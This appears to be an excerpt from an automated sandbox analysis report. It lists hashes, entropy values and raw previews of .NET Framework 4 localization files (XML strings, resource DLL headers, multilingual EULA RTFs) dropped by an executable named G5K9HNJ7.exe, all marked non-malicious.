                                                            Size (bytes):4254
                                                            Entropy (8bit):5.3269919672171735
                                                            Encrypted:false
                                                            SSDEEP:96:k8BfeEfTtXeTjXyZD+dtQRzrGJ6JwtxYMpDNeb6CZXKEp5/Eupwy9Ep+LM2:kgffCXPdOzSJ6JwkOBjC0V2
                                                            MD5:58E6E6D6258994D6A08C6101F11F302D
                                                            SHA1:DF2DB9DA70204CBB539D17DF860A6C45613EF086
                                                            SHA-256:70546BABD12AFAF9FFCC437712DF5491DDF9A6AF8AB4F319FC0EA23AFB186726
                                                            SHA-512:A4A992E2E44C8594E22849C3ED9019C32CF4085E90CC45F0E45A210E68A574A47BF1A06FA405B1F725E1A4DEFBD27E46FE52F3E7A829C8288EC0208BEAC3238B
                                                            Malicious:false
                                                            Preview:{\rtf1\fbidis\ansi\ansicpg1250\deff0\deflang1038\deflangfe1038{\fonttbl{\f0\fswiss\fprq2\fcharset238 Tahoma;}{\f1\froman\fprq2\fcharset238{\*\fname Times New Roman;}Times New Roman CE;}{\f2\fswiss\fprq2\fcharset238 Trebuchet MS;}}..{\colortbl ;\red0\green0\blue255;}..{\*\generator Msftedit 5.41.21.2509;}\viewkind4\uc1\pard\ltrpar\nowidctlpar\sb120\sa120\b\f0\fs20 KIEG\'c9SZ\'cdT\'d5 LICENCFELT\'c9TELEK MICROSOFT SZOFTVERHEZ\f1\par..\pard\brdrb\brdrs\brdrw10\brsp20 \ltrpar\nowidctlpar\sb120\sa120\f0 MICROSOFT .NET-KERETRENDSZER 4 MICROSOFT WINDOWS OPER\'c1CI\'d3S RENDSZERHEZ\f1\par..\f0 MICROSOFT .NET-KERETRENDSZER 4 \'dcGYF\'c9LPROFIL MICROSOFT WINDOWS OPER\'c1CI\'d3S RENDSZERHEZ\par..\'c9S A KAPCSOL\'d3D\'d3 NYELVI CSOMAGOK\f1\par..\pard\ltrpar\nowidctlpar\sb120\sa120\b0\f0 Ezen kieg\'e9sz\'edt\'e9s licenc\'e9t a Microsoft Corporation (vagy az \'d6n lakhelye alapj\'e1n egy t\'e1rsv\'e1llalata) ny\'fajtja \'d6nnek.\b \b0\'d6n akkor haszn\'e1lhatja ezt a kieg\'e9sz\'edt\'e9st, ha rende

                                                            C:\6c8944922f7b98d0b6cd82b768\1040\LocalizedData.xml

                                                            Download File
                                                            Process:C:\ProgramData\Microsoft\Windows\Start Menu\G5K9HNJ7.exe
                                                            File Type:XML 1.0 document, Unicode text, UTF-16, little-endian text, with very long lines (679), with CRLF line terminators
                                                            Category:dropped
                                                            Size (bytes):80060
                                                            Entropy (8bit):3.556654700353072
                                                            Encrypted:false
                                                            SSDEEP:384:4wFACg1fPK/YBZ3tMa9eIzNZNs4fzWmJVo5HnscuRv:/ACgNKjaVLJi2
                                                            MD5:EDA1EC689D45C7FAA97DA4171B1B7493
                                                            SHA1:807FE12689C232EBD8364F48744C82CA278EA9E6
                                                            SHA-256:80FAA30A7592E8278533D3380DCB212E748C190AAEEF62136897E09671059B36
                                                            SHA-512:8385A5DE4EB6B38169DD1EB03926BC6D4604545801F13D99CEE3ACEDE3D34EC9F9D96B828A23AE6246809DC666E67F77A163979679956297533DA40F9365BF2C
                                                            Malicious:false
                                                            Preview:..<.?.x.m.l. .v.e.r.s.i.o.n.=.".1...0.". .e.n.c.o.d.i.n.g.=.".u.t.f.-.1.6.".?.>.....<.S.e.t.u.p. .x.m.l.n.s.=.".h.t.t.p.:././.s.c.h.e.m.a.s...m.i.c.r.o.s.o.f.t...c.o.m./.S.e.t.u.p./.2.0.0.8./.0.1./.i.m.". .x.m.l.n.s.:.i.r.o.n.m.a.n.=.".h.t.t.p.:././.s.c.h.e.m.a.s...m.i.c.r.o.s.o.f.t...c.o.m./.S.e.t.u.p./.2.0.0.8./.0.1./.i.m.".>..... . .<.L.o.c.a.l.i.z.e.d.D.a.t.a.>..... . . . .<.L.a.n.g.u.a.g.e.>..... . . . . . .<.T.e.x.t. .I.D.=.".#.(.l.o.c...B.l.o.c.k.e.r._.i.n._.O.S._.C.o.m.p.a.t.i.b.i.l.i.t.y._.M.o.d.e.).". .L.o.c.a.l.i.z.e.d.T.e.x.t.=.".I.m.p.o.s.s.i.b.i.l.e. .e.s.e.g.u.i.r.e. .i.l. .p.r.o.g.r.a.m.m.a. .d.i. .i.n.s.t.a.l.l.a.z.i.o.n.e. .i.n. .m.o.d.a.l.i.t... .d.i. .c.o.m.p.a.t.i.b.i.l.i.t..... .P.e.r. .u.l.t.e.r.i.o.r.i. .i.n.f.o.r.m.a.z.i.o.n.i.,. .v.e.d.e.r.e. .i.l. .&.l.t.;.A. .H.R.E.F.=.&.q.u.o.t.;.h.t.t.p.:././.g.o...m.i.c.r.o.s.o.f.t...c.o.m./.f.w.l.i.n.k./.?.L.i.n.k.I.d.=.1.6.4.1.5.6.&.q.u.o.t.;.&.g.t.;.f.i.l.e. .R.e.a.d.m.e.&.l.t.;./.A.&.g.t.;..."./.>..... . . . . . .<.T.

                                                            C:\6c8944922f7b98d0b6cd82b768\1040\SetupResources.dll

                                                            Download File
                                                            Process:C:\ProgramData\Microsoft\Windows\Start Menu\G5K9HNJ7.exe
                                                            File Type:PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
                                                            Category:dropped
                                                            Size (bytes):18264
                                                            Entropy (8bit):5.142702232041524
                                                            Encrypted:false
                                                            SSDEEP:384:77n6Tg7AtONBKHno5hWXeWFLXci2jpvz2:7XAbs+ZMi2jpvz2
                                                            MD5:E4860FC5D4C114D5C0781714F3BF041A
                                                            SHA1:864CE88E8AB1DB9AFF6935F9231521B6B72D5974
                                                            SHA-256:6B2D479D2D2B238EC1BA9D14F9A68DC552BC05DCBCC9007C7BB8BE66DEFC643B
                                                            SHA-512:39B0A97C4E83D5CCA1CCCCE494831ADBC18DF1530C02E6A2C13DAE66150F66A7C987A26CECB5587EA71DD530C8BE1E46922FE8C65AE94145D90B0A057C06548D
                                                            Malicious:false
                                                            Antivirus:
                                                            • Antivirus: ReversingLabs, Detection: 0%
                                                            • Antivirus: Virustotal, Detection: 0%, Browse
                                                            Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$........l..............{%......{".....Rich............................PE..L......K.........."!.........,...............................................P......^.....@.......................................... ...)...........0..X............................................................................................text...G...........................@..@.rsrc....0... ...*..................@..@................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                            C:\6c8944922f7b98d0b6cd82b768\1040\eula.rtf

                                                            Download File
                                                            Process:C:\ProgramData\Microsoft\Windows\Start Menu\G5K9HNJ7.exe
                                                            File Type:Rich Text Format data, version 1, ANSI, code page 1252, default language ID 1040
                                                            Category:dropped
                                                            Size (bytes):3643
                                                            Entropy (8bit):5.117983582325958
                                                            Encrypted:false
                                                            SSDEEP:96:rwBfYOP/TfVTJDwXtxjCJEZ+jw/Njppm/F/ZaFgcT/okOct2:yfYXRzMjsA9/EFxDt2
                                                            MD5:6C9C19BFED724146512493F05CBA4F0F
                                                            SHA1:DE249075AAC70D4661ED559FD64DE9F33DE43DB5
                                                            SHA-256:C405AB9949C10619742AF1AF153521FFD85C16821324C16233B025F982A98CAD
                                                            SHA-512:709A522477121EE32152DBE7F90EE4B597621761854B55A791C07C9521FFB899A21C0B84351A68AC3A583B43A91AC5164EF34259D153D21B47C404B4313893B3
                                                            Malicious:false
                                                            Preview:{\rtf1\fbidis\ansi\ansicpg1252\deff0\deflang1040\deflangfe1041{\fonttbl{\f0\fswiss\fprq2\fcharset0 Tahoma;}{\f1\froman\fprq2\fcharset0 Times New Roman;}{\f2\fswiss\fprq2\fcharset0 Trebuchet MS;}}..{\colortbl ;\red0\green0\blue255;}..{\*\generator Msftedit 5.41.21.2509;}\viewkind4\uc1\pard\ltrpar\nowidctlpar\sb120\sa120\b\f0\fs20 CONDIZIONI DI LICENZA SOFTWARE MICROSOFT SUPPLEMENTARI\f1\par..\pard\brdrb\brdrs\brdrw10\brsp20 \ltrpar\nowidctlpar\sb120\sa120\f0 MICROSOFT .NET FRAMEWORK 4 PER IL SISTEMA OPERATIVO MICROSOFT WINDOWS\f1\par..\f0 MICROSOFT .NET FRAMEWORK 4 CLIENT PROFILE PER IL SISTEMA OPERATIVO MICROSOFT WINDOWS\par..E RELATIVI LANGUAGE PACK \f1\par..\pard\ltrpar\nowidctlpar\sb120\sa120\b0\f0 Microsoft Corporation (o, in base al luogo di residenza del licenziatario, una delle sue consociate) concede in licenza al licenziatario il presente supplemento.\b \b0 Qualora il licenziatario sia autorizzato a utilizzare il software per il sistema operativo Microsoft Windows (per il qua

                                                            C:\6c8944922f7b98d0b6cd82b768\1041\LocalizedData.xml

                                                            Download File
                                                            Process:C:\ProgramData\Microsoft\Windows\Start Menu\G5K9HNJ7.exe
                                                            File Type:XML 1.0 document, Unicode text, UTF-16, little-endian text, with very long lines (538), with CRLF line terminators
                                                            Category:dropped
                                                            Size (bytes):68226
                                                            Entropy (8bit):4.416259780276574
                                                            Encrypted:false
                                                            SSDEEP:384:4wVzQOXe7GoXHoMIpYnxKJMlvWy0aO8rRnfJGnav:3QOu7GlCnkJMlvWy0aO8rRnfJ5
                                                            MD5:64FFA6FF8866A15AFF326F11A892BEAD
                                                            SHA1:378201477564507A481BA06EA1BC0620B6254900
                                                            SHA-256:7570390094C0A199F37B8F83758D09DD2CECD147132C724A810F9330499E0CBF
                                                            SHA-512:EA5856617B82D13C9A312CB4F10673DBC4B42D9AC5703AD871E8BDFCC6549E262E61288737AB8EBCF77219D24C0822E7DACF043D1F2D94A97C9B7EC0A5917EF2
                                                            Malicious:false
                                                            Preview:..<.?.x.m.l. .v.e.r.s.i.o.n.=.".1...0.". .e.n.c.o.d.i.n.g.=.".u.t.f.-.1.6.".?.>.....<.S.e.t.u.p. .x.m.l.n.s.=.".h.t.t.p.:././.s.c.h.e.m.a.s...m.i.c.r.o.s.o.f.t...c.o.m./.S.e.t.u.p./.2.0.0.8./.0.1./.i.m.". .x.m.l.n.s.:.i.r.o.n.m.a.n.=.".h.t.t.p.:././.s.c.h.e.m.a.s...m.i.c.r.o.s.o.f.t...c.o.m./.S.e.t.u.p./.2.0.0.8./.0.1./.i.m.".>..... . .<.L.o.c.a.l.i.z.e.d.D.a.t.a.>..... . . . .<.L.a.n.g.u.a.g.e.>..... . . . . . .<.T.e.x.t. .I.D.=.".#.(.l.o.c...B.l.o.c.k.e.r._.i.n._.O.S._.C.o.m.p.a.t.i.b.i.l.i.t.y._.M.o.d.e.).". .L.o.c.a.l.i.z.e.d.T.e.x.t.=."..0.0.0.0.0.0o0.N.c.0.0.0g0.[L.g0M0~0[0.0.0s.0}k0d0D0f0o0.0&.l.t.;.A. .H.R.E.F.=.&.q.u.o.t.;.h.t.t.p.:././.g.o...m.i.c.r.o.s.o.f.t...c.o.m./.f.w.l.i.n.k./.?.L.i.n.k.I.d.=.1.6.4.1.5.6.&.q.u.o.t.;.&.g.t.;..0.0.0.0 ..0.0.0&.l.t.;./.A.&.g.t.;..0.SgqW0f0O0`0U0D0.0"./.>..... . . . . . .<.T.e.x.t. .I.D.=.".#.(.l.o.c...B.l.o.c.k.e.r._.U.n.i.n.s.t.a.l.l.W.a.r.n.i.n.g.).". .L.o.c.a.l.i.z.e.d.T.e.x.t.=.".M.i.c.r.o.s.o.f.t. ...N.E.T. .F.r.a.m.e.w.o.r.k. ..0.0.0

                                                            C:\6c8944922f7b98d0b6cd82b768\1041\SetupResources.dll

                                                            Download File
                                                            Process:C:\ProgramData\Microsoft\Windows\Start Menu\G5K9HNJ7.exe
                                                            File Type:PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
                                                            Category:dropped
                                                            Size (bytes):15704
                                                            Entropy (8bit):5.929554826924656
                                                            Encrypted:false
                                                            SSDEEP:192:Cg0rjUfwtW1+/FuZhS5CSJk/lhAW5kEW1QKPnEtObMacxc8hjeyveCXPX:5hC7mS53JkNSW5kEW1LXci2jpvJ
                                                            MD5:278FD7595B580A016705D00BE363612F
                                                            SHA1:89A299A9ABECB624C3606267371B7C07B74B3B26
                                                            SHA-256:B3ECD3AEA74D0D97539C4971C69F87C4B5FE478FC42A4A31F7E1593D1EBA073F
                                                            SHA-512:838D23D35D8D042A208E8FA88487CD1C72DA48F336157D03B9549DD55C75DA60A83F6DD2B3107EB3E5A24F3FAD70AE1629ACC563371711117C3C3E299B59D838
                                                            Malicious:false
                                                            Antivirus:
                                                            • Antivirus: ReversingLabs, Detection: 0%
                                                            • Antivirus: Virustotal, Detection: 0%, Browse
                                                            Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$........l..............{%......{".....Rich............................PE..L......K.........."!........."...............................................@............@.......................................... ..h............&..X............................................................................................text...G...........................@..@.rsrc.... ... ... ..................@..@................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                            C:\6c8944922f7b98d0b6cd82b768\1041\eula.rtf

                                                            Download File
                                                            Process:C:\ProgramData\Microsoft\Windows\Start Menu\G5K9HNJ7.exe
                                                            File Type:Rich Text Format data, version 1, ANSI, code page 932, default language ID 1033
                                                            Category:dropped
                                                            Size (bytes):10125
                                                            Entropy (8bit):4.144479793761895
                                                            Encrypted:false
                                                            SSDEEP:192:tEf13/qC2+PCsANROmuuU8EhZFJEj2VQoKOwyWAOxzpOh+uqaJgt2:tBtQoCnGDzhuqz2
                                                            MD5:75CE7D721BDB78F1020ACF2B206B1859
                                                            SHA1:CC0418DE8806811D21B19005BC5DB0092767F340
                                                            SHA-256:2ABDC7246E95E420B4E66CC3C07ACDB56FF390BCD524E0D8525D5BF345030A5A
                                                            SHA-512:FAFAC863DC825FC0B104751FE62CDA2C43048683F9D7E45659784206EA67F1AA98EA282AFC2A3A4BA287D03F73B21EC1E2F8C02F5D036CE96CAEFD851A5389E5
                                                            Malicious:false
                                                            Preview:{\rtf1\fbidis\ansi\ansicpg932\deff0\deflang1033\deflangfe1041{\fonttbl{\f0\fmodern\fprq2\fcharset128 \'82\'6c\'82\'72 \'82\'6f\'83\'53\'83\'56\'83\'62\'83\'4e;}{\f1\fswiss\fprq2\fcharset0 Tahoma;}{\f2\froman\fprq2\fcharset0 Times New Roman;}{\f3\fswiss\fprq2\fcharset0 Trebuchet MS;}}..{\colortbl ;\red0\green0\blue255;}..{\*\generator Msftedit 5.41.21.2509;}{\info{\horzdoc}{\*\lchars $(<?[\'5c\'7b\'81\'92\'5c\'81\'e1\'81\'65\'81\'67}{\*\fchars !%'),.:\'3b>?]\'7d\'81\'91\'81\'8b\'81\'45\'81\'e2\'81\'66\'81\'68\'81\'f1}}..\viewkind4\uc1\pard\ltrpar\nowidctlpar\sb120\sa120\lang1041\b\f0\fs20\'83\'7d\'83\'43\'83\'4e\'83\'8d\'83\'5c\'83\'74\'83\'67\lang1033\f1 \lang1041\f0\'83\'5c\'83\'74\'83\'67\'83\'45\'83\'46\'83\'41\'92\'c7\'89\'c1\'83\'89\'83\'43\'83\'5a\'83\'93\'83\'58\'8f\'f0\'8d\'80\lang1033\f2\par..\pard\brdrb\brdrs\brdrw10\brsp20 \ltrpar\nowidctlpar\sb120\sa120\f1 MICROSOFT WINDOWS \lang1041\f0\'83\'49\'83\'79\'83\'8c\'81\'5b\'83\'65\'83\'42\'83\'93\'83\'4f\lang1033\f1 \lang1041\

                                                            C:\6c8944922f7b98d0b6cd82b768\1042\LocalizedData.xml

                                                            Download File
                                                            Process:C:\ProgramData\Microsoft\Windows\Start Menu\G5K9HNJ7.exe
                                                            File Type:XML 1.0 document, Unicode text, UTF-16, little-endian text, with very long lines (509), with CRLF line terminators
                                                            Category:dropped
                                                            Size (bytes):65238
                                                            Entropy (8bit):4.384411743704147
                                                            Encrypted:false
                                                            SSDEEP:384:4wsx1QzSzXLGKgooDQA0pb5ywW4JSUQvEQzH/dv:egtqpb5yw5Jg
                                                            MD5:78C16DA54542C9ED8FA32FED3EFAF10D
                                                            SHA1:AD8CFE972C8A418C54230D886E549E00C7E16C40
                                                            SHA-256:E3E3A2288FF840AB0E7C5E8F7B4CFB1F26E597FB17CFC581B7728116BD739ED1
                                                            SHA-512:D9D7BB82A1D752A424BF81BE3D86ABEA484ACBB63D35C90A8EE628E14CF34A7E8A02F37D2EA82AA2CE2C9AA4E8416A7A6232C632B7655F2033C4AAAB208C60BF
                                                            Malicious:false
                                                            Preview:..<.?.x.m.l. .v.e.r.s.i.o.n.=.".1...0.". .e.n.c.o.d.i.n.g.=.".u.t.f.-.1.6.".?.>.....<.S.e.t.u.p. .x.m.l.n.s.=.".h.t.t.p.:././.s.c.h.e.m.a.s...m.i.c.r.o.s.o.f.t...c.o.m./.S.e.t.u.p./.2.0.0.8./.0.1./.i.m.". .x.m.l.n.s.:.i.r.o.n.m.a.n.=.".h.t.t.p.:././.s.c.h.e.m.a.s...m.i.c.r.o.s.o.f.t...c.o.m./.S.e.t.u.p./.2.0.0.8./.0.1./.i.m.".>..... . .<.L.o.c.a.l.i.z.e.d.D.a.t.a.>..... . . . .<.L.a.n.g.u.a.g.e.>..... . . . . . .<.T.e.x.t. .I.D.=.".#.(.l.o.c...B.l.o.c.k.e.r._.i.n._.O.S._.C.o.m.p.a.t.i.b.i.l.i.t.y._.M.o.d.e.).". .L.o.c.a.l.i.z.e.d.T.e.x.t.=.".8.X. .......... .$.X. ...\.....D. ....`. ... ........ ...8.\. .....@. .&.l.t.;.A. .H.R.E.F.=.&.q.u.o.t.;.h.t.t.p.:././.g.o...m.i.c.r.o.s.o.f.t...c.o.m./.f.w.l.i.n.k./.?.L.i.n.k.I.d.=.1.6.4.1.5.6.&.q.u.o.t.;.&.g.t.;..... ..... ...|.&.l.t.;./.A.&.g.t.;.D. .8.p.X.....$..."./.>..... . . . . . .<.T.e.x.t. .I.D.=.".#.(.l.o.c...B.l.o.c.k.e.r._.U.n.i.n.s.t.a.l.l.W.a.r.n.i.n.g.).". .L.o.c.a.l.i.z.e.d.T.e.x.t.=.".M.i.c.r.o.s.o.f.t. ...N.E.T. .F.r.a.m.e.

                                                            C:\6c8944922f7b98d0b6cd82b768\1042\SetupResources.dll

                                                            Download File
                                                            Process:C:\ProgramData\Microsoft\Windows\Start Menu\G5K9HNJ7.exe
                                                            File Type:PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
                                                            Category:dropped
                                                            Size (bytes):15192
                                                            Entropy (8bit):5.9622226182057325
                                                            Encrypted:false
                                                            SSDEEP:192:Hpix6f+jYxzekdPKNS0N7gVCAMWpCeWRQKPnEtObMacxc8hjeyveCXmo+:3ibMj0lgRMWpCeWRLXci2jpv8o+
                                                            MD5:FCFD69EC15A6897A940B0435439BF5FC
                                                            SHA1:6DE41CABDB45294819FC003560F9A2D1E3DB9A7B
                                                            SHA-256:90F377815E3C81FC9AE5F5B277257B82811417CA3FFEACD73BAB530061B3BE45
                                                            SHA-512:4DC3580B372CEE1F4C01569BAEA8CD0A92BC613648DB22FF1855920E47387A151964B295A1126597B44BB0C596E8757B1FCF47CDA010F9BBB15A88F97F41B8BF
                                                            Malicious:false
                                                            Antivirus:
                                                            • Antivirus: ReversingLabs, Detection: 0%
                                                            • Antivirus: Virustotal, Detection: 0%, Browse
                                                            Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$........l..............{%......{".....Rich............................PE..L......K.........."!......... ...............................................@......v.....@.......................................... ...............$..X............................................................................................text...G...........................@..@.rsrc.... ... ......................@..@................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                            C:\6c8944922f7b98d0b6cd82b768\1042\eula.rtf

                                                            Download File
                                                            Process:C:\ProgramData\Microsoft\Windows\Start Menu\G5K9HNJ7.exe
                                                            File Type:Rich Text Format data, version 1, ANSI, code page 949, default language ID 1033
                                                            Category:dropped
                                                            Size (bytes):12687
                                                            Entropy (8bit):4.39170120937692
                                                            Encrypted:false
                                                            SSDEEP:192:MUf0PVF4MjeKojIfE6wK+b/mIr4tIAcAIce5rD6O1IuonKZim+dfNAW6qUK84Zn+:aK0wB/Tr4TmckIuCm+TAWdUN/re2
                                                            MD5:A3B318528E286EC387E81934E5D3B081
                                                            SHA1:CEDCC08D008E21C0E88EEF8354DAB8CFF2EF51AD
                                                            SHA-256:2954EDB51628942A37A9BF58DA628932638C35ED61744892E42623FE4CCD06A0
                                                            SHA-512:3544D9BE654C859CDE2B9CD8614C5ABED89E488DFEE2F51AB92A509873DC504942E375388D12379DE9D29DEEDE662667F8CC4BC6D2DCD50C5AC865CE6C44352D
                                                            Malicious:false
                                                            Preview:{\rtf1\fbidis\ansi\ansicpg949\deff0\deflang1033\deflangfe1042{\fonttbl{\f0\fswiss\fprq2\fcharset0 Arial;}{\f1\froman\fprq2\fcharset129 \'b9\'d9\'c5\'c1;}}..{\colortbl ;\red0\green0\blue255;}..{\*\generator Msftedit 5.41.21.2509;}{\info{\horzdoc}{\*\lchars $(<?[\'5c\'7b\'a1\'cc\'a1\'cd\'a1\'ec\'a1\'ae\'a1\'b0}{\*\fchars !%'),.:\'3b>?]\'7d\'a1\'cb\'a1\'c6\'a1\'ed\'a1\'af\'a1\'b1}}..\viewkind4\uc1\pard\ltrpar\nowidctlpar\sb120\sa120\b\f0\fs28 MICROSOFT \lang1042\f1\'bc\'d2\'c7\'c1\'c6\'ae\'bf\'fe\'be\'ee\lang1033\f0 \lang1042\f1\'c3\'df\'b0\'a1\lang1033\f0 \lang1042\f1\'bb\'e7\'bf\'eb\'b1\'c7\lang1033\f0 \lang1042\f1\'b0\'e8\'be\'e0\'bc\'ad\lang1033\f0\par..\pard\brdrb\brdrs\brdrw10\brsp20 \ltrpar\nowidctlpar\sb120\sa120\fs20 MICROSOFT WINDOWS \lang1042\f1\'bf\'ee\'bf\'b5\lang1033\f0 \lang1042\f1\'c3\'bc\'c1\'a6\'bf\'eb\lang1033\f0 MICROSOFT .NET FRAMEWORK 4\par..MICROSOFT WINDOWS \lang1042\f1\'bf\'ee\'bf\'b5\lang1033\f0 \lang1042\f1\'c3\'bc\'c1\'a6\'bf\'eb\lang1033\f0 MICROSOFT .N

                                                            C:\6c8944922f7b98d0b6cd82b768\1043\LocalizedData.xml

                                                            Download File
                                                            Process:C:\ProgramData\Microsoft\Windows\Start Menu\G5K9HNJ7.exe
                                                            File Type:XML 1.0 document, Unicode text, UTF-16, little-endian text, with very long lines (658), with CRLF line terminators
                                                            Category:dropped
                                                            Size (bytes):79634
                                                            Entropy (8bit):3.5656146816718155
                                                            Encrypted:false
                                                            SSDEEP:384:4wCsfDNzgDbRiRVqxdYRF405vYtyVB1HaAzTGZUeJvuQFKhlQ5gwJBKQauJf1tSY:jbZKbRyVqb82IB+GlQ5gwJBzauJzkA
                                                            MD5:6506B4E64EBF6121997FA227E762589F
                                                            SHA1:71BC1478C012D9EC57FC56A5266DD325B7801221
                                                            SHA-256:415112AE783A87427C2FADD7B010ADE4F1A7C23B27E4B714B7B507C16B572A1C
                                                            SHA-512:39024EA9D42352F7C1BD6FEFE0574054ECEB4059F773CFAEB26C42FAADA2540AE95FB34718D30CCB6DA157D2597F80D12A024461FBD0E8D510431BA6FFA81EC2
                                                            Malicious:false
                                                            Preview:..<.?.x.m.l. .v.e.r.s.i.o.n.=.".1...0.". .e.n.c.o.d.i.n.g.=.".u.t.f.-.1.6.".?.>.....<.S.e.t.u.p. .x.m.l.n.s.=.".h.t.t.p.:././.s.c.h.e.m.a.s...m.i.c.r.o.s.o.f.t...c.o.m./.S.e.t.u.p./.2.0.0.8./.0.1./.i.m.". .x.m.l.n.s.:.i.r.o.n.m.a.n.=.".h.t.t.p.:././.s.c.h.e.m.a.s...m.i.c.r.o.s.o.f.t...c.o.m./.S.e.t.u.p./.2.0.0.8./.0.1./.i.m.".>..... . .<.L.o.c.a.l.i.z.e.d.D.a.t.a.>..... . . . .<.L.a.n.g.u.a.g.e.>..... . . . . . .<.T.e.x.t. .I.D.=.".#.(.l.o.c...B.l.o.c.k.e.r._.i.n._.O.S._.C.o.m.p.a.t.i.b.i.l.i.t.y._.M.o.d.e.).". .L.o.c.a.l.i.z.e.d.T.e.x.t.=.".S.e.t.u.p. .k.a.n. .n.i.e.t. .w.o.r.d.e.n. .u.i.t.g.e.v.o.e.r.d. .i.n. .d.e. .c.o.m.p.a.t.i.b.i.l.i.t.e.i.t.s.m.o.d.u.s... .R.a.a.d.p.l.e.e.g. .h.e.t. .&.l.t.;.A. .H.R.E.F.=.&.q.u.o.t.;.h.t.t.p.:././.g.o...m.i.c.r.o.s.o.f.t...c.o.m./.f.w.l.i.n.k./.?.L.i.n.k.I.d.=.1.6.4.1.5.6.&.q.u.o.t.;.&.g.t.;.L.e.e.s.m.i.j.-.b.e.s.t.a.n.d.&.l.t.;./.A.&.g.t.;. .v.o.o.r. .m.e.e.r. .i.n.f.o.r.m.a.t.i.e..."./.>..... . . . . . .<.T.e.x.t. .I.D.=.".#.(.l.o.c...B.l.o.c.

                                                            C:\6c8944922f7b98d0b6cd82b768\1043\SetupResources.dll

                                                            Download File
                                                            Process:C:\ProgramData\Microsoft\Windows\Start Menu\G5K9HNJ7.exe
                                                            File Type:PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
                                                            Category:dropped
                                                            Size (bytes):19288
                                                            Entropy (8bit):5.101791972320269
                                                            Encrypted:false
                                                            SSDEEP:384:3124Y0WDDkowwX8OZjv1t2WlLeWvLXci2jpvc:lYZhzMi2jpvc
                                                            MD5:76D6E9F15D842E6A56EE42C9C5CCABCA
                                                            SHA1:36E6FA7C032F69DEA2C34B5934AC556AAE738CBB
                                                            SHA-256:A961DE62DA74B05EAF593BB78A4A5A4C5586FE2D0D4A45D99675D03E7F01D7C5
                                                            SHA-512:F9E04AA073EBF98BDD13F6A0A9214DDA42CD5FDFEC24873CF171B77D31408CA6698BF0C9D931A93BDD7A54FE55A9E6394F2C8050C7E847455E4A36585E36D6EB
                                                            Malicious:false
                                                            Antivirus:
                                                            • Antivirus: ReversingLabs, Detection: 0%
                                                            • Antivirus: Virustotal, Detection: 0%, Browse
                                                            Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$........l..............{%......{".....Rich............................PE..L......K.........."!.........0...............................................P......ky....@.......................................... ...,...........4..X............................................................................................text...G...........................@..@.rsrc....0... ......................@..@................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                            C:\6c8944922f7b98d0b6cd82b768\1043\eula.rtf

                                                            Download File
                                                            Process:C:\ProgramData\Microsoft\Windows\Start Menu\G5K9HNJ7.exe
                                                            File Type:Rich Text Format data, version 1, ANSI, code page 1252, default language ID 1033
                                                            Category:dropped
                                                            Size (bytes):3546
                                                            Entropy (8bit):5.203062637938479
                                                            Encrypted:false
                                                            SSDEEP:96:rTBfrnjTsVT08DfQhtJlIcm3wEM8LPMpDlGu3x+O0H+Ozo+SBT+OZt6S2:ZfLltGwEMAPOkukO0eONNOT2
                                                            MD5:305AE79EC7D0E8D1F826D70D7D469BB4
                                                            SHA1:BBE8FFD83FCA6C013A20CDEE6EA0AFFD988C4815
                                                            SHA-256:69537AEF05EDFB55EC32897B3DD59724A825FDDECCD92BDD5E8840CB92B1B383
                                                            SHA-512:A7368CEC366E8F717F3FD51FA71133A02C5E7B44D095B849320E15F8D95DC1A58AB977FA9A4C1633FCD1AD82D929FF8FB2271C816BE8B2B8892D7389E3E3EACD
                                                            Malicious:false
                                                            Preview:{\rtf1\fbidis\ansi\ansicpg1252\deff0\deflang1033\deflangfe1033{\fonttbl{\f0\fswiss\fprq2\fcharset0 Tahoma;}{\f1\froman\fprq2\fcharset0 Times New Roman;}{\f2\fswiss\fprq2\fcharset0 Trebuchet MS;}}..{\colortbl ;\red0\green0\blue255;}..{\*\generator Msftedit 5.41.21.2509;}\viewkind4\uc1\pard\ltrpar\nowidctlpar\sb120\sa120\lang1043\b\f0\fs20 AANVULLENDE LICENTIEVOORWAARDEN VOOR MICROSOFT-SOFTWARE\lang1033\f1\par..\pard\brdrb\brdrs\brdrw10\brsp20 \ltrpar\nowidctlpar\sb120\sa120\lang1043\f0 MICROSOFT .NET FRAMEWORK 4 VOOR HET BESTURINGSSYSTEEM MICROSOFT WINDOWS\lang1033\f1\par..\lang1043\f0 MICROSOFT .NET FRAMEWORK 4 CLIENT PROFILE VOOR HET BESTURINGSSYSTEEM MICROSOFT WINDOWS \par..EN GERELATEERDE TAALPAKKETTEN\lang1033\f1\par..\pard\ltrpar\nowidctlpar\sb120\sa120\lang1043\b0\f0 Microsoft Corporation (of, afhankelijk uw locatie, een van haar gelieerde ondernemingen) geeft dit supplement aan u in licentie.\lang1033\b \lang1043\b0 Als u een licentie hebt voor het gebruik van Microsoft Windows

                                                            C:\6c8944922f7b98d0b6cd82b768\1044\LocalizedData.xml

                                                            Download File
                                                            Process:C:\ProgramData\Microsoft\Windows\Start Menu\G5K9HNJ7.exe
                                                            File Type:XML 1.0 document, Unicode text, UTF-16, little-endian text, with very long lines (653), with CRLF line terminators
                                                            Category:dropped
                                                            Size (bytes):79296
                                                            Entropy (8bit):3.5898407770439955
                                                            Encrypted:false
                                                            SSDEEP:384:4wn2IhI4z6T1sHCqeHveRWUw+KbGpK+9C/E6b2NJBf2OEuv:V9hI4z6T1siqeHveRhAo9CM6b2NJBuOD
                                                            MD5:120104FA24709C2A9D8EFC84FF0786CD
                                                            SHA1:B513FA545EFAE045864D8527A5EC6B6CEBE31BB9
                                                            SHA-256:516525636B91C16A70AEF8D6F6B424DC1EE7F747B8508B396EE88131B2BB0947
                                                            SHA-512:1EA8EB2BE9D5F4EF6F1F2C0D90CB228A9BB58D7143CCAFE77E18CE52EC4ACA25DDE0BA18430FD4D3D7962D079CCBE7E2552B2C7090361E03C6FDFB7C2B9C7325
                                                            Malicious:false
